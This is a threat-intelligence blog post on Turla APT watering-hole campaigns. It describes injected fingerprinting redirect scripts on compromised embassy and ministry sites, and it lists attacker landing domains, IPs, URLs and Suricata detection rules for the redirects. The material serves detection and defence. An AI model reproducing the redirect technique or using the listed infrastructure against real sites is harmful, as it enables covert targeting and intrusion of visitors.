Navigation

Subscribe

Get the latest posts delivered right to your inbox.

or subscribe via RSS with Feedly!

Turla Watering Hole Campaigns 2016/2017

A common TTP of the Turla APT group has been based around watering hole attacks. In late 2016, we began observing what is now called the “Clicky” watering hole campaign unfold across the globe, in addition to a similar campaign I’ll refer to as the “img” campaign. With the kickoff of the 401TRG, we have decided it is worth sharing this information to complement the public reporting by our colleagues at ESET. This post will focus on the watering holes, as opposed to post-compromise activity.

For this campaign, Turla has been compromising multiple domains which attract visitors of interest to the the group. The domains are compromised via CMS exploits, then modified with an added script on the homepage of the domain, subsequently forwarding legitimate visitors to a secondary domain which is completely controlled by the attackers. The script (detailed below) forces at least a single HTTP GET request to the secondary domains for either a benign file (PHP or JS) or a page that does not exist (PHP, JS, HTML). The purpose of this single GET request from the watering hole domain is for the group to collect the visitor's public IP address in addition to basic host information provided in the HTTP header (user agent) - to effectively fingerprint the visitors. If the visitor is within a targeted IP range, the attack continues by providing the visitor an additional profiling script, also noted by ESET.

While the groups TTPs are constantly evolving, it is believed this is a method for the attacker to filter targets of interest via the fingerprint to pick out which are in line with the group's agenda. The group only delivers malware to those who they have selected as targets based on the fingerprint. Utilizing the information gathered from this fingerprinting technique the group is able to deliver malware likely to be highly effective on the victim host.

Technical Details

The group has injected various scripts on the compromised domains. Below are samples of the scripts placed either directly on the home page, or within other referenced files loaded by the home page. We have also observed cases where only specific pages of the original compromised domains (the watering hole) contain the injected script. This allowed us to gain additional insight into the target profile of Turla.

Screen-Shot-2017-10-16-at-3.12.12-PM
Figure 1: One of the first scripts observed. Note the typo // when concatenating var a and var b. (Beautified for readability)

Screen-Shot-2017-10-16-at-3.12.37-PM
Figure 2: Updated script, corrected and iteration on misdirection attempt. (Beautified for readability)

Screen-Shot-2017-10-16-at-3.12.46-PM
Figure 3: Modified script for new secondary landing, in addition to the use of the double forward slash instead of specifically using http://. (Beautified for readability)

Screen-Shot-2017-10-16-at-3.12.57-PM
Figure 4: Separate injected image reference to PHP file. Likely a different campaign reusing attacker infrastructure - “Img” Campaign.

The destination PHP and JS files have been observed as either nonexistent, or replaced with benign file during non-target visits. For example, one use of a benign file was a simple copy of the MD5-generating code from www.myersdaily.org/joseph/javascript/.

Screen-Shot-2017-10-16-at-3.13.07-PM-2
Figure 5: HTTP GET request to secondary landing originating from watering hole domain.

Indicators

Compromised Domains (Confirmed Watering hole victims) Domain Description
au.int African Union, Parent organizations: Organisation of African Unity, African Economic Community
mfa.uz The Ministry of Foreign Affairs of the Republic of Uzbekistan
mfa.gov.kg The Ministry of Foreign Affairs of the Kyrgyz Republic
mfa.gov.md Ministry of Foreign Affairs and European Integration of Moldova
capcooperation.org Resource Center for International Cooperation in Aquitaine
namibianembassyusa.org Embassy of Namibia, Washington, D.C.
zambiaembassy.org Embassy of Zambia, Washington, D.C.
iraqiembassy.us Embassy of Iraq, Washington, D.C.
jordanembassyus.org Embassy of Jordan, Washington, D.C.
embassypro.com NA
mischendorf.at Mischendorf is a town in the district of Oberwart in the Austrian state of Burgenland
jse.org The Socialist Youth of Spain
embassyofindonesia.org Embassy of the Republic of Indonesia, Washington, D.C.
bewusstkaufen.at Austrian Ministry of the Environment
sai.gov.ua Office of Road Safety emergency DPD Ukraine
avsa.org African Violet Society of America
osv.or.at Austrian Swimming Association
mareeg.com Somalia World News Organization
vfreiheitliche.at Provincial party of the Freedom Party of Austria
afghanembassy.tj Embassy of Afghanistan in Dushanbe, Tajikistan
barbara-rosenkranz.at An Austrian politician for the Freedom Party of Austria
bioresurse.ro National Institute of Research and Development for Food Bioresources, Romania

Suspicious Relationship (Possible Watering hole victims) Domain Description
frenchamerican.org The French-American Foundation, a non-governmental organization
nfi.org.in National Foundation for India
russianembassy.org Embassy of Russia in Washington, D.C

Landing IPs (Most Recent) Landing Domains Landing URLs
98.143.148.72 nbcpost[.]com rss.nbcpost[.]com/news/today/content.php
107.155.99.133 travelclothes[.]org static.travelclothes[.]org/main.js
58.158.177.102 epsoncorp[.]com drivers.epsoncorp[.]com/plugin/analytics/counter.js
185.68.16.62 msgcollection[.]com msgcollection.com/templates/nivoslider/loading.php
58.158.177.102 mentalhealthcheck[.]net mentalhealthcheck[.]net/update/check.php mentalhealthcheck[.]net/update/counter.js mentalhealthcheck[.]net//update/counter.js
209.99.64.25 alessandrosl[.]com alessandrosl[.]com/core/modules/mailer/mailer.php
74.208.70.127 loveandlight.aws3[.]net loveandlight.aws3.net/wp-includes/theme-compat/akismet.php

Suricata IDS Rules

  • alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"401TRG - Possible Turla APT SWC Redirect - Clicky Campaign M1"; flow:established,from_server; file_data; content:"clicky_site_ids"; fast_pattern; content:"document.createElement"; nocase; distance:0; within:100; content:"/counter.js"; distance:0; content:"text/javascript"; distance:0; content:".appendChild"; distance:0; content:"|3b|"; pcre:"/^\s*[^\r\n]+.\ssrc\s=\s*[\x22\x27]\s*[a-z]+.getclicky.com/js\s*[\x22\x27]\s*\x3b/Rsi"; reference:url,https://401trg.pw/turla-watering-hole-campaigns-2016-2017/; sid:70045804; rev:1;)

  • alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"401TRG - Possible Turla APT SWC Redirect - Clicky Campaign M2"; flow:established,from_server; file_data; content:"document.createElement"; nocase; fast_pattern; content:"var"; distance:0; within:50; content:"text/javascript"; distance:0; content:".appendChild"; distance:0; content:"var"; pcre:"/^\s*(?P[A-Za-z0-9-]{1,20})\s*=\s*[\x22\x27]\shttp\x3a\x2f\x2f[^\r\n]+[\x22\x27]\s\x3b\svar\s(?P[A-Za-z0-9-]{1,20})\s*=\s*[\x22\x27]\s*/[^\r\n]+[\x22\x27]\s*\x3b\s*.+.\ssrc\s=\s*(?P=vara)\s*.\sconcat\s(\s*(?P=varb)\s*)\s*\x3b/Rsi"; reference:url,https://401trg.pw/turla-watering-hole-campaigns-2016-2017/; sid:70045805; rev:1;)

If you would like to automate the intake of these indicators, please see our GitHub Detections repo.

Basic Actor Information

The following information has been collected from shared reports and OSINT. For additional details on other activity from this group, please see the ‘additional resources’ section below.

Associated Group Names:

  • Turla - Kaspersky Lab
  • Krypton - Microsoft
  • Venomous Bear - Crowdstrike

Known Targets of Interest:

Government, NGOs, telecommunications, energy, and education. The group shows special interest in Europe, Australia, and United States. The group's agenda is potentially focused on collecting intellectual property and political information.

TTPs:

Strategic web compromises via CMS exploits to build long standing watering hole campaigns. In addition, the group is known to use satellite ISPs within their attack infrastructure, and spear phishing tactics. Publicly tied to the use of malware called Turla/Uroburos/Snake and WipBot/Tavdig, to name a few.

Recommended Actions

First, understand the tactics and IR processes behind identifying such attacks. For organizations or individuals who were not affected by this campaign, the scenario can be used as a simulation attack to evaluate your detection abilities, in addition to response approach and general understanding. While these tactics are highly targeted and not common to experience in the wild, this can be a great way to evaluate security posture.

If applicable, utilize the provided indicators in security products within your network. These indicators may be helpful in web gateway, firewall, or endpoint products. Please note, not all domains or IP addresses are only used within this campaign. Such indicators may be shared infrastructure for legitimate uses or generally legitimate domains. Triggering on them is not a confirmation of activity or this campaign. Instead, use them in combination as hunting triggers if you have a larger data retention history, due to the age of activity shared in this post.

Additional Resources on this Campaign and Turla